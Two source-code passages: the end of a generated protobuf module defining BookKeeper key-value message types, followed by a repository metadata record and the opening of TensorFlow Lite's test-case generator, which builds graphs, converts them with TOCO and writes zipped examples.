_descriptor.FieldDescriptor(
name='version', full_name='bookkeeper.proto.kv.KeyValue.version', index=3,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='bookkeeper.proto.kv.KeyValue.value', index=4,
number=5, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='is_number', full_name='bookkeeper.proto.kv.KeyValue.is_number', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='number_value', full_name='bookkeeper.proto.kv.KeyValue.number_value', index=6,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=34,
serialized_end=177,
)
_EVENT = _descriptor.Descriptor(
name='Event',
full_name='bookkeeper.proto.kv.Event',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='bookkeeper.proto.kv.Event.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='kv', full_name='bookkeeper.proto.kv.Event.kv', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='prev_kv', full_name='bookkeeper.proto.kv.Event.prev_kv', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
_EVENT_EVENTTYPE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=180,
serialized_end=364,
)
_EVENT.fields_by_name['type'].enum_type = _EVENT_EVENTTYPE
_EVENT.fields_by_name['kv'].message_type = _KEYVALUE
_EVENT.fields_by_name['prev_kv'].message_type = _KEYVALUE
_EVENT_EVENTTYPE.containing_type = _EVENT
DESCRIPTOR.message_types_by_name['KeyValue'] = _KEYVALUE
DESCRIPTOR.message_types_by_name['Event'] = _EVENT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
KeyValue = _reflection.GeneratedProtocolMessageType('KeyValue', (_message.Message,), dict(
DESCRIPTOR = _KEYVALUE,
__module__ = 'kv_pb2'
# @@protoc_insertion_point(class_scope:bookkeeper.proto.kv.KeyValue)
))
_sym_db.RegisterMessage(KeyValue)
Event = _reflection.GeneratedProtocolMessageType('Event', (_message.Message,), dict(
DESCRIPTOR = _EVENT,
__module__ = 'kv_pb2'
# @@protoc_insertion_point(class_scope:bookkeeper.proto.kv.Event)
))
_sym_db.RegisterMessage(Event)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| {
"content_hash": "77f7dcfec46129fb2ee19c4327916af7",
"timestamp": "",
"source": "github",
"line_count": 189,
"max_line_length": 755,
"avg_line_length": 38.714285714285715,
"alnum_prop": 0.7049337160038267,
"repo_name": "apache/bookkeeper",
"id": "51fedc3c7aed8f1b7c56d66b2ea8e3ad7b34ce68",
"size": "7396",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "stream/clients/python/bookkeeper/proto/kv_pb2.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "11886"
},
{
"name": "C++",
"bytes": "17844"
},
{
"name": "Dockerfile",
"bytes": "11186"
},
{
"name": "Groovy",
"bytes": "48262"
},
{
"name": "Java",
"bytes": "15908174"
},
{
"name": "JavaScript",
"bytes": "12042"
},
{
"name": "Makefile",
"bytes": "6544"
},
{
"name": "Python",
"bytes": "215336"
},
{
"name": "Roff",
"bytes": "39396"
},
{
"name": "SCSS",
"bytes": "1345"
},
{
"name": "Shell",
"bytes": "183376"
},
{
"name": "Thrift",
"bytes": "1473"
}
],
"symlink_target": ""
} |
"""Generate a series of TensorFlow graphs that become tflite test cases.
Usage:
generate_examples <output directory>
bazel run //tensorflow/lite/testing:generate_examples
To more easily debug failures use (or override) the --save_graphdefs flag to
place text proto graphdefs into the generated zip files.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import operator
import os
import random
import re
import string
import tempfile
import traceback
import zipfile
import numpy as np
from six import StringIO
from six.moves import xrange
# TODO(aselle): Disable GPU for now
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# pylint: disable=g-import-not-at-top
import tensorflow as tf
from google.protobuf import text_format
# TODO(aselle): switch to TensorFlow's resource_loader
from tensorflow.lite.testing import generate_examples_report as report_lib
from tensorflow.lite.testing import string_util_wrapper
from tensorflow.python.framework import test_util
from tensorflow.python.framework import graph_util as tf_graph_util
from tensorflow.python.ops import rnn
from tensorflow.python.ops import array_ops
RANDOM_SEED = 342
TEST_INPUT_DEPTH = 3
# A map from regular expression to bug number. Any test failure with label
# matching the expression will be considered due to the corresponding bug.
KNOWN_BUGS = {
# TOCO doesn't support scalars as input.
# Concat doesn't work with a single input tensor
r"concat.*num_tensors=1": "67378344",
# Transposition in MatMul is not fully supported.
"fully_connected.*transpose_a=True": "67586970",
# Softmax graphs are too complex.
r"softmax.*dim=0": "67749831",
# BatchToSpaceND only supports 4D tensors.
r"batch_to_space_nd.*input_shape=\[8,2,2,2,1,1\]": "70594733",
# Div will use floordiv.
r"div.*int32": "72051395",
}
class Options(object):
"""All options for example generation."""
def __init__(self):
# Directory where the outputs will be go.
self.output_path = None
# Particular zip to output.
self.zip_to_output = None
# Path to toco tool.
self.toco = None
    # If a particular model is affected by a known bug, count it as a Toco
# error.
self.known_bugs_are_errors = False
# Raise an exception if any toco error is encountered.
self.ignore_converter_errors = False
# Include intermediate graphdefs in the output zip files.
self.save_graphdefs = False
# Whether the TFLite Flex converter is being used.
self.run_with_flex = False
    # The function to convert a TensorFlow model to a TFLite model.
# See the document for `toco_convert` function for its required signature.
# TODO(ycling): Decouple `toco_convert` function from this module, and
# remove the `toco` attribute in this class.
self.tflite_convert_function = toco_convert
# A map from regular expression to bug number. Any test failure with label
# matching the expression will be considered due to the corresponding bug.
self.known_bugs = KNOWN_BUGS
# A map from names to functions which make test cases.
_MAKE_TEST_FUNCTIONS_MAP = {}
# A decorator to register the make test functions.
# Usage:
# All the make_*_test should be registered. Example:
# @register_make_test_function()
# def make_conv_tests(options):
# # ...
# If a function is decorated by other decorators, it's required to specify the
# name explicitly. Example:
# @register_make_test_function(name="make_unidirectional_sequence_lstm_tests")
# @test_util.enable_control_flow_v2
# def make_unidirectional_sequence_lstm_tests(options):
# # ...
def register_make_test_function(name=None):
def decorate(function, name=name):
if name is None:
name = function.__name__
_MAKE_TEST_FUNCTIONS_MAP[name] = function
return decorate
class ExtraTocoOptions(object):
"""Additional toco options besides input, output, shape."""
def __init__(self):
# Whether to ignore control dependency nodes.
self.drop_control_dependency = False
# Allow custom ops in the toco conversion.
self.allow_custom_ops = False
# Rnn states that are used to support rnn / lstm cells.
self.rnn_states = None
    # Split the LSTM inputs from 5 inputs to 18 inputs for TFLite.
self.split_tflite_lstm_inputs = None
def toco_options(data_types,
input_arrays,
output_arrays,
shapes,
extra_toco_options=ExtraTocoOptions()):
"""Create TOCO options to process a model.
Args:
data_types: input and inference types used by TOCO.
input_arrays: names of the input tensors
output_arrays: name of the output tensors
shapes: shapes of the input tensors
extra_toco_options: additional toco options
Returns:
the options in a string.
"""
shape_str = ":".join([",".join(str(y) for y in x) for x in shapes if x])
inference_type = "FLOAT"
# TODO(ahentz): if we get multi-input quantization to work we need this
# to change
if data_types[0] == "QUANTIZED_UINT8":
inference_type = "QUANTIZED_UINT8"
s = (" --input_data_types=%s" % ",".join(data_types) +
" --inference_type=%s" % inference_type +
" --input_format=TENSORFLOW_GRAPHDEF" + " --output_format=TFLITE" +
" --input_arrays=%s" % ",".join(input_arrays) +
" --output_arrays=%s" % ",".join(output_arrays))
if shape_str:
s += (" --input_shapes=%s" % shape_str)
if extra_toco_options.drop_control_dependency:
s += " --drop_control_dependency"
if extra_toco_options.allow_custom_ops:
s += " --allow_custom_ops"
if extra_toco_options.rnn_states:
s += (" --rnn_states='" + extra_toco_options.rnn_states + "'")
if extra_toco_options.split_tflite_lstm_inputs is not None:
if extra_toco_options.split_tflite_lstm_inputs:
s += " --split_tflite_lstm_inputs=true"
else:
s += " --split_tflite_lstm_inputs=false"
return s
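# Illustration (hypothetical arguments): toco_options(["FLOAT"], ["input"],
# ["out"], [[1, 3, 4, 3]]) returns the single flat string
#   " --input_data_types=FLOAT --inference_type=FLOAT"
#   " --input_format=TENSORFLOW_GRAPHDEF --output_format=TFLITE"
#   " --input_arrays=input --output_arrays=out --input_shapes=1,3,4,3"
# (wrapped here for readability).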
def format_result(t):
"""Convert a tensor to a format that can be used in test specs."""
if t.dtype.kind not in [np.dtype(np.string_).kind, np.dtype(np.object_).kind]:
# Output 9 digits after the point to ensure the precision is good enough.
values = ["{:.9f}".format(value) for value in list(t.flatten())]
return ",".join(values)
else:
return string_util_wrapper.SerializeAsHexString(t.flatten())
def write_examples(fp, examples):
"""Given a list `examples`, write a text format representation.
  The file format is CSV-like with a simple repeated pattern. We would like
  to use proto here, but we can't yet because the interface with the Android
  team uses this format.
  Args:
    fp: File-like object to write to.
    examples: Example dictionary consisting of keys "inputs" and "outputs"
"""
def write_tensor(fp, x):
"""Write tensor in file format supported by TFLITE example."""
fp.write("dtype,%s\n" % x.dtype)
fp.write("shape," + ",".join(map(str, x.shape)) + "\n")
fp.write("values," + format_result(x) + "\n")
fp.write("test_cases,%d\n" % len(examples))
for example in examples:
fp.write("inputs,%d\n" % len(example["inputs"]))
for i in example["inputs"]:
write_tensor(fp, i)
fp.write("outputs,%d\n" % len(example["outputs"]))
for i in example["outputs"]:
write_tensor(fp, i)
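# For illustration, a hypothetical call with one test case holding a single
# float32 input/output of shape [2] produces a file such as:
#   test_cases,1
#   inputs,1
#   dtype,float32
#   shape,2
#   values,1.000000000,2.000000000
#   outputs,1
#   dtype,float32
#   shape,2
#   values,1.000000000,2.000000000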
def write_test_cases(fp, model_name, examples):
"""Given a dictionary of `examples`, write a text format representation.
The file format is protocol-buffer-like, even though we don't use proto due
to the needs of the Android team.
Args:
fp: File-like object to write to.
model_name: Filename where the model was written to, relative to filename.
    examples: Example dictionary consisting of keys "inputs" and "outputs"
"""
fp.write("load_model: %s\n" % os.path.basename(model_name))
for example in examples:
fp.write("reshape {\n")
for t in example["inputs"]:
fp.write(" input: \"" + ",".join(map(str, t.shape)) + "\"\n")
fp.write("}\n")
fp.write("invoke {\n")
for t in example["inputs"]:
fp.write(" input: \"" + format_result(t) + "\"\n")
for t in example["outputs"]:
fp.write(" output: \"" + format_result(t) + "\"\n")
fp.write(" output_shape: \"" + ",".join([str(dim) for dim in t.shape]) +
"\"\n")
fp.write("}\n")
_TF_TYPE_INFO = {
tf.float32: (np.float32, "FLOAT"),
tf.float16: (np.float16, "FLOAT"),
tf.int32: (np.int32, "INT32"),
tf.uint8: (np.uint8, "QUANTIZED_UINT8"),
tf.int16: (np.int16, "QUANTIZED_INT16"),
tf.int64: (np.int64, "INT64"),
tf.bool: (np.bool, "BOOL"),
tf.string: (np.string_, "STRING"),
}
def create_tensor_data(dtype, shape, min_value=-100, max_value=100):
"""Build tensor data spreading the range [min_value, max_value)."""
if dtype in _TF_TYPE_INFO:
dtype = _TF_TYPE_INFO[dtype][0]
if dtype in (tf.float32, tf.float16):
value = (max_value-min_value)*np.random.random_sample(shape)+min_value
elif dtype in (tf.int32, tf.uint8, tf.int64, tf.int16):
value = np.random.randint(min_value, max_value+1, shape)
elif dtype == tf.bool:
value = np.random.choice([True, False], size=shape)
elif dtype == np.string_:
# Not the best strings, but they will do for some basic testing.
letters = list(string.ascii_uppercase)
return np.random.choice(letters, size=shape).astype(dtype)
return np.dtype(dtype).type(value) if np.isscalar(value) else value.astype(
dtype)
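# Usage sketch (hypothetical arguments): create_tensor_data(tf.float32, [2, 3])
# returns a float32 ndarray of shape (2, 3) with values drawn uniformly from
# [-100, 100); create_tensor_data(tf.int32, [4], 0, 9) returns four random
# integers between 0 and 9 inclusive.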
def create_scalar_data(dtype, min_value=-100, max_value=100):
"""Build scalar tensor data range from min_value to max_value exclusively."""
if dtype in _TF_TYPE_INFO:
dtype = _TF_TYPE_INFO[dtype][0]
if dtype in (tf.float32, tf.float16):
value = (max_value - min_value) * np.random.random() + min_value
elif dtype in (tf.int32, tf.uint8, tf.int64, tf.int16):
value = np.random.randint(min_value, max_value + 1)
return np.array(value, dtype=dtype)
def freeze_graph(session, outputs):
"""Freeze the current graph.
Args:
session: Tensorflow sessions containing the graph
outputs: List of output tensors
Returns:
The frozen graph_def.
"""
return tf_graph_util.convert_variables_to_constants(
session, session.graph.as_graph_def(), [x.op.name for x in outputs])
@register_make_test_function()
def make_control_dep_tests(options):
"""Make a set of tests that use control dependencies."""
test_parameters = [{
"input_shape": [[], [1, 1, 1, 1], [1, 15, 14, 1], [3, 15, 14, 3]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
filter_value = tf.zeros((3, 3, TEST_INPUT_DEPTH, 8), tf.float32)
assert_op = tf.assert_greater_equal(input_tensor, input_tensor - 1)
with tf.control_dependencies([assert_op]):
out = tf.nn.conv2d(input_tensor, filter_value,
strides=(1, 1, 1, 1), padding="SAME")
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(tf.float32, parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
extra_toco_options = ExtraTocoOptions()
extra_toco_options.drop_control_dependency = True
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
extra_toco_options,
expected_tf_failures=3)
def toco_convert(
options, graph_def, input_tensors, output_tensors, **kwargs):
"""Convert a model's graph def into a tflite model.
  NOTE: this currently shells out to the toco binary, but we would like to
  convert to Python API tooling in the future.
Args:
options: An Options instance.
graph_def: A GraphDef object.
input_tensors: List of input tensor tuples `(name, shape, type)`.
output_tensors: List of output tensors (names).
**kwargs: Extra options to be passed.
Returns:
output tflite model, log_txt from conversion
or None, log_txt if it did not convert properly.
"""
  # Convert ophint ops if present.
  graph_def = tf.lite.experimental.convert_op_hints_to_stubs(
      graph_def=graph_def)
  graph_def_str = graph_def.SerializeToString()
  # Path to the toco binary invoked below (see Options.toco).
  bin_path = options.toco
  extra_toco_options = kwargs.get("extra_toco_options", ExtraTocoOptions())
input_arrays = [x[0] for x in input_tensors]
data_types = [_TF_TYPE_INFO[x[2]][1] for x in input_tensors]
opts = toco_options(
data_types=data_types,
input_arrays=input_arrays,
shapes=[x[1] for x in input_tensors],
output_arrays=output_tensors,
extra_toco_options=extra_toco_options)
with tempfile.NamedTemporaryFile() as graphdef_file, \
tempfile.NamedTemporaryFile() as output_file, \
tempfile.NamedTemporaryFile("w+") as stdout_file:
graphdef_file.write(graph_def_str)
graphdef_file.flush()
# TODO(aselle): Switch this to subprocess at some point.
if "pb2lite" in bin_path and options.run_with_flex:
opts = ("--input_arrays={0} --output_arrays={1}".format(
",".join(input_arrays), ",".join(output_tensors)))
elif options.run_with_flex:
opts += " --enable_select_tf_ops --force_select_tf_ops"
cmd = ("%s --input_file=%s --output_file=%s %s > %s 2>&1" %
(bin_path, graphdef_file.name, output_file.name, opts,
stdout_file.name))
exit_code = os.system(cmd)
log = (
cmd + "exited with code %d" % exit_code + "\n------------------\n" +
stdout_file.read())
return (None if exit_code != 0 else output_file.read()), log
def normalize_output_name(output_name):
"""Remove :0 suffix from tensor names."""
return output_name.split(":")[0] if output_name.endswith(
":0") else output_name
# How many test cases we may have in a zip file. Too many test cases will
# slow down the test data generation process.
_MAX_TESTS_PER_ZIP = 500
def make_zip_of_tests(options,
test_parameters,
make_graph,
make_test_inputs,
extra_toco_options=ExtraTocoOptions(),
use_frozen_graph=False,
expected_tf_failures=0):
"""Helper to make a zip file of a bunch of TensorFlow models.
  This does a cartesian product of the dictionary of test_parameters and
  calls make_graph() for each item in the cartesian product set.
If the graph is built successfully, then make_test_inputs() is called to
build expected input/output value pairs. The model is then converted to tflite
with toco, and the examples are serialized with the tflite model into a zip
file (2 files per item in the cartesian product set).
Args:
options: An Options instance.
test_parameters: Dictionary mapping to lists for each parameter.
e.g. `{"strides": [[1,3,3,1], [1,2,2,1]], "foo": [1.2, 1.3]}`
make_graph: function that takes current parameters and returns tuple
`[input1, input2, ...], [output1, output2, ...]`
make_test_inputs: function taking `curr_params`, `session`, `input_tensors`,
`output_tensors` and returns tuple `(input_values, output_values)`.
extra_toco_options: Additional toco options.
    use_frozen_graph: Whether or not to freeze the graph before the toco
      converter.
    expected_tf_failures: Number of times tensorflow is expected to fail in
      executing the input graphs. In some cases it is OK for TensorFlow to
      fail because one or more combinations of parameters are invalid.
Raises:
RuntimeError: if there are toco errors that can't be ignored.
"""
zip_path = os.path.join(options.output_path, options.zip_to_output)
parameter_count = 0
for parameters in test_parameters:
parameter_count += functools.reduce(
operator.mul, [len(values) for values in parameters.values()])
if parameter_count > _MAX_TESTS_PER_ZIP:
raise RuntimeError(
"Too many parameter combinations for generating '%s'.\n"
"There are %d combinations while the upper limit is %d.\n"
"Having too many combinations will slow down the tests.\n"
"Please consider splitting the test into multiple functions.\n"
% (zip_path, parameter_count, _MAX_TESTS_PER_ZIP))
# TODO(aselle): Make this allow multiple inputs outputs.
archive = zipfile.PyZipFile(zip_path, "w")
zip_manifest = []
convert_report = []
toco_errors = 0
processed_labels = set()
for parameters in test_parameters:
keys = parameters.keys()
for curr in itertools.product(*parameters.values()):
label = zip_path.replace(".zip", "_") + (",".join(
"%s=%r" % z for z in sorted(zip(keys, curr))).replace(" ", ""))
if label[0] == "/":
label = label[1:]
if label in processed_labels:
# Do not populate data for the same label more than once. It will cause
# errors when unzipping.
continue
processed_labels.add(label)
param_dict = dict(zip(keys, curr))
def build_example(label, param_dict_real):
"""Build the model with parameter values set in param_dict_real.
Args:
label: Label of the model (i.e. the filename in the zip).
param_dict_real: Parameter dictionary (arguments to the factories
make_graph and make_test_inputs)
Returns:
(tflite_model_binary, report) where tflite_model_binary is the
serialized flatbuffer as a string and report is a dictionary with
keys `toco_log` (log of toco conversion), `tf_log` (log of tf
conversion), `toco` (a string of success status of the conversion),
`tf` (a string success status of the conversion).
"""
np.random.seed(RANDOM_SEED)
report = {"toco": report_lib.NOTRUN, "tf": report_lib.FAILED}
# Build graph
report["tf_log"] = ""
report["toco_log"] = ""
tf.reset_default_graph()
with tf.device("/cpu:0"):
try:
inputs, outputs = make_graph(param_dict_real)
except (tf.errors.UnimplementedError, tf.errors.InvalidArgumentError,
ValueError):
report["tf_log"] += traceback.format_exc()
return None, report
sess = tf.Session()
try:
baseline_inputs, baseline_outputs = (make_test_inputs(
param_dict_real, sess, inputs, outputs))
except (tf.errors.UnimplementedError, tf.errors.InvalidArgumentError,
ValueError):
report["tf_log"] += traceback.format_exc()
return None, report
report["toco"] = report_lib.FAILED
report["tf"] = report_lib.SUCCESS
# Convert graph to toco
input_tensors = [(input_tensor.name.split(":")[0], input_tensor.shape,
input_tensor.dtype) for input_tensor in inputs]
output_tensors = [normalize_output_name(out.name) for out in outputs]
graph_def = freeze_graph(
sess,
tf.global_variables() + inputs +
outputs) if use_frozen_graph else sess.graph_def
if "split_tflite_lstm_inputs" in param_dict_real:
extra_toco_options.split_tflite_lstm_inputs = param_dict_real[
"split_tflite_lstm_inputs"]
tflite_model_binary, toco_log = options.tflite_convert_function(
options, graph_def, input_tensors,
output_tensors, extra_toco_options=extra_toco_options)
report["toco"] = (report_lib.SUCCESS if tflite_model_binary is not None
else report_lib.FAILED)
report["toco_log"] = toco_log
if True or options.save_graphdefs:
archive.writestr(label + ".pbtxt",
text_format.MessageToString(graph_def),
zipfile.ZIP_DEFLATED)
if tflite_model_binary:
archive.writestr(label + ".bin", tflite_model_binary,
zipfile.ZIP_DEFLATED)
example = {"inputs": baseline_inputs, "outputs": baseline_outputs}
example_fp = StringIO()
write_examples(example_fp, [example])
archive.writestr(label + ".inputs",
example_fp.getvalue(), zipfile.ZIP_DEFLATED)
example_fp2 = StringIO()
write_test_cases(example_fp2, label + ".bin", [example])
archive.writestr(label + "_tests.txt",
example_fp2.getvalue(), zipfile.ZIP_DEFLATED)
zip_manifest.append(label + "\n")
return tflite_model_binary, report
_, report = build_example(label, param_dict)
if report["toco"] == report_lib.FAILED:
ignore_error = False
if not options.known_bugs_are_errors:
for pattern, bug_number in options.known_bugs.items():
if re.search(pattern, label):
print("Ignored TOCO error due to bug %s" % bug_number)
ignore_error = True
if not ignore_error:
toco_errors += 1
print("-----------------\ntoco error!\n%s\n-----------------\n" %
report["toco_log"])
convert_report.append((param_dict, report))
report_io = StringIO()
report_lib.make_report_table(report_io, zip_path, convert_report)
archive.writestr("report.html", report_io.getvalue())
archive.writestr("manifest.txt", "".join(zip_manifest), zipfile.ZIP_DEFLATED)
# Log statistics of what succeeded
total_conversions = len(convert_report)
tf_success = sum(1 for x in convert_report
if x[1]["tf"] == report_lib.SUCCESS)
toco_success = sum(1 for x in convert_report
if x[1]["toco"] == report_lib.SUCCESS)
percent = 0
if tf_success > 0:
percent = float(toco_success) / float(tf_success) * 100.
tf.logging.info(("Archive %s Considered %d graphs, %d TF evaluated graphs "
" and %d TOCO converted graphs (%.1f%%"), zip_path,
total_conversions, tf_success, toco_success, percent)
tf_failures = parameter_count - tf_success
if tf_failures / parameter_count > 0.8:
raise RuntimeError(("Test for '%s' is not very useful. "
"TensorFlow fails in %d percent of the cases.") %
(zip_path, int(100 * tf_failures / parameter_count)))
if tf_failures != expected_tf_failures:
raise RuntimeError(("Expected TF to fail %d times while generating '%s', "
"but that happened %d times") % (expected_tf_failures,
zip_path, tf_failures))
if not options.ignore_converter_errors and toco_errors > 0:
raise RuntimeError(
"Found %d errors while generating toco models" % toco_errors)
def make_pool_tests(pool_op_in):
"""Make a set of tests to do average pooling.
Args:
pool_op_in: TensorFlow pooling operation to test i.e. `tf.nn.avg_pool2d`.
Returns:
A function representing the true generator (after curried pool_op_in).
"""
pool_op = pool_op_in
def f(options, expected_tf_failures=0):
"""Actual function that generates examples.
Args:
options: An Options instance.
expected_tf_failures: number of expected tensorflow failures.
"""
    # Choose a set of parameters
test_parameters = [{
"ksize": [[2, 1, 1, 2], [1, 1, 1, 1], [1, 1, 2, 1], [1, 10, 11, 1]],
"strides": [[2, 1, 1, 2], [1, 1, 1, 1], [1, 1, 2, 1], [1, 10, 11, 1]],
# TODO(aselle): should add in a degenerate shape (e.g. [1, 0, 1, 1]).
"input_shape": [[], [1, 1, 1, 1], [1, 15, 14, 1], [3, 15, 14, 3]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"], # TODO(aselle): NCHW would be good
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = pool_op(
input_tensor,
ksize=parameters["ksize"],
strides=parameters["strides"],
data_format=parameters["data_format"],
padding=parameters["padding"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(tf.float32, parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
return f
@register_make_test_function()
def make_l2_pool_tests(options):
make_pool_tests(make_l2_pool)(options, expected_tf_failures=80)
@register_make_test_function()
def make_avg_pool_tests(options):
make_pool_tests(tf.nn.avg_pool)(options, expected_tf_failures=80)
@register_make_test_function()
def make_max_pool_tests(options):
make_pool_tests(tf.nn.max_pool)(options, expected_tf_failures=80)
@register_make_test_function()
def make_abs_tests(options):
"""Make a set of tests to do relu."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[], [1], [2, 3], [1, 1, 1, 1], [1, 3, 4, 3],
[3, 15, 14, 3], [3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.abs(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-10, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_elu_tests(options):
"""Make a set of tests to do (float) tf.nn.elu."""
test_parameters = [
{
"input_shape": [[], [1], [2, 3], [1, 1, 1, 1], [1, 3, 4, 3],
[3, 15, 14, 3], [3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
},
]
def build_graph(parameters):
"""Build the graph for the test case."""
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.elu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build the inputs for the test case."""
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_identity_tests(options):
"""Make a set of tests to do identity."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[], [1], [3, 3]],
"use_snapshot": [False, True],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
    # We add the Multiply before Identity just as a workaround to make the test
# pass when input_shape is scalar.
# During graph transformation, TOCO will replace the Identity op with
# Reshape when input has shape. However, currently TOCO can't distinguish
# between missing shape and scalar shape. As a result, when input has scalar
# shape, this conversion still fails.
    # TODO(b/129197312), remove the workaround code once the bug is fixed.
input_doubled = input_tensor * 2.0
if parameters["use_snapshot"]:
identity_output = array_ops.snapshot(input_doubled)
else:
identity_output = tf.identity(input_doubled)
return [input_tensor], [identity_output]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_relu_tests(options):
"""Make a set of tests to do relu."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[], [1], [2, 3], [1, 1, 1, 1], [1, 3, 4, 3],
[3, 15, 14, 3], [3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.relu(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_relu1_tests(options):
"""Make a set of tests to do relu1."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[], [1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3],
[3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
# Note that the following is not supported:
# out = tf.maximum(-1.0, tf.minimum(input_tensor, 1.0))
out = tf.minimum(1.0, tf.maximum(input_tensor, -1.0))
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-3, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_relu6_tests(options):
"""Make a set of tests to do relu6."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[], [1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3],
[3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
    out = tf.nn.relu6(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-3, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_prelu_tests(options):
"""Make a set of tests to do PReLU."""
test_parameters = [
{
# The canonical case for image processing is having a 4D `input`
          # (NHWC) and `shared_axes`=[1, 2], so the alpha parameter is per
# channel.
"input_shape": [[1, 10, 10, 3], [3, 3, 3, 3]],
"shared_axes": [[1, 2], [1]],
},
{
# 2D-3D example. Share the 2nd axis.
